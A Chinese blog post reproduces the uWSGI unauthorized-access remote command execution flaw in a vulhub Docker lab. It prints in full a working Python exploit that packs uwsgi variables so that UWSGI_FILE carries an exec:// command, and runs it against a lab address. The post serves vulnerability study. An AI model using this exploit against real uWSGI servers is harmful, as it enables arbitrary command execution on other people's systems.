uWSGI 未授权访问漏洞

最新推荐文章于 2023-07-07 14:06:08 发布
最新推荐文章于 2023-07-07 14:06:08 发布
阅读量844 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111824887
版权

声明

好好学习,天天向上

漏洞描述

uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,通常被用于运行Python WEB应用。uwsgi除了是应用容器的名称之外,它和Fastcgi之类的一样,也是前端server与后端应用容器之间的一个交流标准。目前nginx,apache也支持uwsgi协议进行代理转发请求。

uWSGI支持通过魔术变量(Magic Variables)的方式动态配置后端Web应用。如果其端口暴露在外,攻击者可以构造uwsgi数据包,并指定魔术变量UWSGI_FILE,运用exec://协议执行任意命令。

影响范围

uWSGI 1.9及以上(最新2.0.15,报告官方之后,官方在3.0开发版中修复了这个问题,不受到影响)

复现过程

这里使用2.0.17版本

使用vulhub

/app/vulhub-master/uwsgi/unacc

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8080

使用POC,poc.py,内容如下

#!/usr/bin/python
# coding: utf-8
######################
# Uwsgi RCE Exploit
######################
# Author: wofeiwo@80sec.com
# Created: 2017-7-18
# Last modified: 2018-1-30
# Note: Just for research purpose

import sys
import socket
import argparse
import requests

def sz(x):
    s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
    s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')
    return s[::-1]


def pack_uwsgi_vars(var):
    pk = b''
    for k, v in var.items() if hasattr(var, 'items') else var:
        pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')
    result = b'\x00' + sz(pk) + b'\x00' + pk
    return result


def parse_addr(addr, default_port=None):
    port = default_port
    if isinstance(addr, str):
        if addr.isdigit():
            addr, port = '', addr
        elif ':' in addr:
            addr, _, port = addr.partition(':')
    elif isinstance(addr, (list, tuple, set)):
        addr, port = addr
    port = int(port) if port else port
    return (addr or '127.0.0.1', port)


def get_host_from_url(url):
    if '//' in url:
        url = url.split('//', 1)[1]
    host, _, url = url.partition('/')
    return (host, '/' + url)


def fetch_data(uri, payload=None, body=None):
    if 'http' not in uri:
        uri = 'http://' + uri
    s = requests.Session()
    # s.headers['UWSGI_FILE'] = payload
    if body:
        import urlparse
        body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path))
        d = s.post(uri, data=body_d)
    else:
        d = s.get(uri)

    return {
        'code': d.status_code,
        'text': d.text,
        'header': d.headers
    }


def ask_uwsgi(addr_and_port, mode, var, body=''):
    if mode == 'tcp':
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(parse_addr(addr_and_port))
    elif mode == 'unix':
        s = socket.socket(socket.AF_UNIX)
        s.connect(addr_and_port)
    s.send(pack_uwsgi_vars(var) + body.encode('utf8'))
    response = []
    # Actually we dont need the response, it will block if we run any commands.
    # So I comment all the receiving stuff. 
    # while 1:
    #     data = s.recv(4096)
    #     if not data:
    #         break
    #     response.append(data)
    s.close()
    return b''.join(response).decode('utf8')


def curl(mode, addr_and_port, payload, target_url):
    host, uri = get_host_from_url(target_url)
    path, _, qs = uri.partition('?')
    if mode == 'http':
        return fetch_data(addr_and_port+uri, payload)
    elif mode == 'tcp':
        host = host or parse_addr(addr_and_port)[0]
    else:
        host = addr_and_port
    var = {
        'SERVER_PROTOCOL': 'HTTP/1.1',
        'REQUEST_METHOD': 'GET',
        'PATH_INFO': path,
        'REQUEST_URI': uri,
        'QUERY_STRING': qs,
        'SERVER_NAME': host,
        'HTTP_HOST': host,
        'UWSGI_FILE': payload,
        'SCRIPT_NAME': target_url
    }
    return ask_uwsgi(addr_and_port, mode, var)


def main(*args):
    desc = """
    This is a uwsgi client & RCE exploit.
    Last modifid at 2018-01-30 by wofeiwo@80sec.com
    """
    elog = "Example:uwsgi_exp.py -u 1.2.3.4:5000 -c \"echo 111>/tmp/abc\""
    
    parser = argparse.ArgumentParser(description=desc, epilog=elog)

    parser.add_argument('-m', '--mode', nargs='?', default='tcp',
                        help='Uwsgi mode: 1. http 2. tcp 3. unix. The default is tcp.',
                        dest='mode', choices=['http', 'tcp', 'unix'])

    parser.add_argument('-u', '--uwsgi', nargs='?', required=True,
                        help='Uwsgi server: 1.2.3.4:5000 or /tmp/uwsgi.sock',
                        dest='uwsgi_addr')

    parser.add_argument('-c', '--command', nargs='?', required=True,
                        help='Command: The exploit command you want to execute, must have this.',
                        dest='command')

    if len(sys.argv) < 2:
        parser.print_help()
        return
    args = parser.parse_args()
    if args.mode.lower() == "http":
        print("[-]Currently only tcp/unix method is supported in RCE exploit.")
        return
    payload = 'exec://' + args.command + "; echo test" # must have someting in output or the uWSGI crashs.
    print("[*]Sending payload.")
    print(curl(args.mode.lower(), args.uwsgi_addr, payload, '/testapp'))

if __name__ == '__main__':
    main()

执行

python poc.py -u 192.168.239.129:8000 -c "touch /tmp/uwsgi"

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【墨者学院 】uWSGI 漏洞复现(CVE-2018-7490)
Summer's blog
05-13 1万+
0x01 漏洞详情 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。 uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘…’序列的特制URL请求利用该漏洞查看系统上的任意文件。 uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_RO...
CVE-2018-7490 uWSGI PHP Plugin目录遍历
king丶
07-12 842
#攻击标题:uWSGI PHP Plugin目录遍历 #日期:2018年3月1日 #开发作者:Marios Nicolaides-RUNESEC #评审人:西蒙·洛伊齐德斯和尼古拉斯·马基塔尼斯-鲁内塞克 #供应商主页:https://uwsgi-docs.readthedocs.io #受影响的软件:2.0.17之前的uWSGI PHP Plugin #测试依据:uWSGI 2.0.12和2.0.15 #公司代码:CVE-2018-7490 #类别:Web应用程序 概述 ...
uWSGI 授权访问 漏洞复现
Senimo
07-27 784
uWSGI 授权访问 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 uWSGI 是一款 Web 应用程序服务器,它实现了 WSGI、uwsgi 和 http 等协议,并支持通过插件来运行各种语言,通常被用于运行 Python WEB 应用。uWSGI除了是应用容器的名称之外,它和 Fastcgi 之类的一样,也是前端 server 与后端应用容器之间的一个交流标准。目前nginx,apache也支持 uWSGI 协议进行代理转发请求。 uWS
uWSGI 漏洞复现
Jerry____的博客
11-29 745
uWSGI 漏洞复现(CVE-2018-7490) 背景介绍 uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。 实训目标 1、学会根据漏洞编...
uWSGI 漏洞(CVE-2018-7490)
qq_40624810的博客
11-09 463
… 表示上一级目录 %2f是url编码的/ uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘…’序列的特制URL请求利用该漏洞查看系统上的任意文件。 访问地址存在使用信息,存在uwsgi/php,但是没找到显示版本的地址,就盲试、 可以多加几个%2f确保是根目录 ...
uWSGI授权访问漏洞 漏洞复现
ADummy的博客
03-04 317
uWSGI授权访问漏洞 by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ uWSGI是一个Web应用程序服务器,它实现诸如WSGI / uwsgi / http之类的协议,并通过插件支持多种语言。就像Fastcgi一样,uwsgi不仅是应用程序名称,还是前端服务器和后端应用程序容器之间的交换标准。 uWSGI允许通过Magic Variables动态配置后端Web应用程序。如果端口暴露在外,攻击者可以构造uwsgi数据包并指定magic变量UWSGI_FILE,从
uWSGI 漏洞复现(CVE-2018-7490)
weixin_47493074的博客
09-16 1159
uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件,利用该漏洞查看系统上的任意文件
修复uWSGI 授权访问漏洞
ling的专栏
07-07 575
阿里给出的建议 “禁用 uwsgi socket 协议或配置 uwsgi socket 仅能通过本地访问”当工程在容器中运行的时候,就不能设置仅本地访问了。所以只能以htttp方式启动uwsgi。nginx配置修改(无论是80端口的http,还是443端口的https,均是以下写法)将原uwsgi的启动命令(socket模式)
漏洞复现----35、uWSGI PHP 目录遍历漏洞 (CVE-2018-7490)
七天
06-27 1946
uWSGI目录遍历漏洞
墨者学院】uWSGI 漏洞复现(CVE-2018-7490)----web安全
Seaern的博客
03-03 495
训练地址 首先我们看一下背景介绍-----uWSGI,很详细,了解一下 目标是根据漏洞编号查找详情>>>>>>>>>>>>我们看题目给的很明显! 进入靶场看一下: 我们看到了uWSGI,再根据题目去查一下相关漏洞 找到这个>>>>>>>>>>u...
python代码执行漏洞_Vulnhub-uWSGI 远程代码执行漏洞
weixin_31304817的博客
12-28 315
郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。漏洞简述uWSGI是一个经常被使用的应用容器,通常情况下由于WSGI是Python实现的标准,所以uWSGI经常作为Python应用容器启动。但实际上uWSGI同样也支持加载Perl/Ruby/Go等应用。uWSGI程序中默认注册了一系列schemes,其中很多都是危险协议,尤其注意到其中有exec协议,可以直接通过刚才的...
vulhub漏洞复现系列之uwsgi(目录穿越CVE-2018-7490,unacc授权访问)
weixin_43071873的博客
12-07 1322
前阵子和领导出差,偶然聊到渗透应该怎么学习,领导说渗透测试其实就是两块内容,一是信息收集,二是漏洞匹配。做漏洞复现呢,就是为了漏洞匹配这一块,复现的时候要留意漏洞的特征,利用条件,这才是漏洞复现的真谛吧。当然这是我个人的感觉,有其他意见还请各位大哥留言,我一定做好笔记。 前言:uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,通常被用于运行Python WEB应用。uwsgi除了是应用容器的名称之外,它和Fastcgi之类的一样,也是前端se
授权swarm到宿主机免密访问
9ian1i
06-09 700
0x00 swarm的授权访问swarm是一个docker的集群管理工具,它兼容大部分的docker命令,会将请求转发给特定的docker。 官方文档说,别把2375端口暴露在外网,但很多时候大家都会选择默认安装,即把端口绑定在 0.0.0.0:2375,而它自身又缺乏有效的验证机制,所以一旦出现在外网,那就是见光死。0x01 我们的payload直入主题,对于开放的2375端口,直接执行 do
漏洞复现-uwsgi-目录穿越】vulfocus/uwsgi-cve_2018_7490
10-15 714
uwsgi-目录穿越】
vulhub漏洞复现72_uWSGI
weixin_44193247的博客
02-13 1490
vulhub漏洞复现练习篇
【墨者靶场】---2、uWSGI 漏洞复现(CVE-2018-7490)
qq_43168364的博客
08-21 509
背景介绍 uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。 实训目标 1、学会根据漏洞编号查找漏洞详情; 2、了解uWSGI CVE-2018-7490漏洞形成原理; 3、掌握uWSGI CVE-2018-7490漏洞利用方法; 解题方向 利用
uWSGI 漏洞修复
最新发布
03-19
关于uWSGI漏洞修复,我可以给你一些基本的介绍。 首先,要修复uWSGI漏洞,你需要及时更新uWSGI的版本。开发团队会定期发布新版本,其中包含了修复漏洞和增强安全性的补丁。因此,确保你使用的是最新版本的uWSGI...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值